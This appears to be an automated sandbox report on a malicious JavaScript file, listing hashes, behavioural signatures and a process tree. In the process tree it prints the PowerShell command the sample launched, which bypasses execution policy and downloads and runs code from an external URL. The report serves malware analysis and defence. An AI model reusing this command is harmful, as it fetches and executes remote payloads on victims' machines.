Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:37
Static task
static1
Behavioral task
behavioral1
Sample
a6ceacfc3c6db3c48ac1b9d78a5f8386442d12b248a36be4f54f342e968bcb6e.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a6ceacfc3c6db3c48ac1b9d78a5f8386442d12b248a36be4f54f342e968bcb6e.js
Resource
win10v2004-20240226-en
General
-
Target
a6ceacfc3c6db3c48ac1b9d78a5f8386442d12b248a36be4f54f342e968bcb6e.js
-
Size
67KB
-
MD5
8b8941167d820a4eb5ef0d4be49c0ada
-
SHA1
bbaf1ece80596ffe425263ef8eb174c4be1df159
-
SHA256
a6ceacfc3c6db3c48ac1b9d78a5f8386442d12b248a36be4f54f342e968bcb6e
-
SHA512
119b7823731b676267e301f72c3ca75f546d0d38afb71a898954d97a0be95097033167858a094c1268c44231bb1f02235fcf49230a00bf73f5f6e7a6c4017a37
-
SSDEEP
1536:u+Bh9ollwqsqGbYHlaNKAkPwLZYSI0SIo0zDrLP5kX/fNabTT+r:lBDollwqsqwYHlbJwVYazDrLmfcT+r
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2556 powershell.exe 4 2556 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2556 2848 wscript.exe 28 PID 2848 wrote to memory of 2556 2848 wscript.exe 28 PID 2848 wrote to memory of 2556 2848 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a6ceacfc3c6db3c48ac1b9d78a5f8386442d12b248a36be4f54f342e968bcb6e.js1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-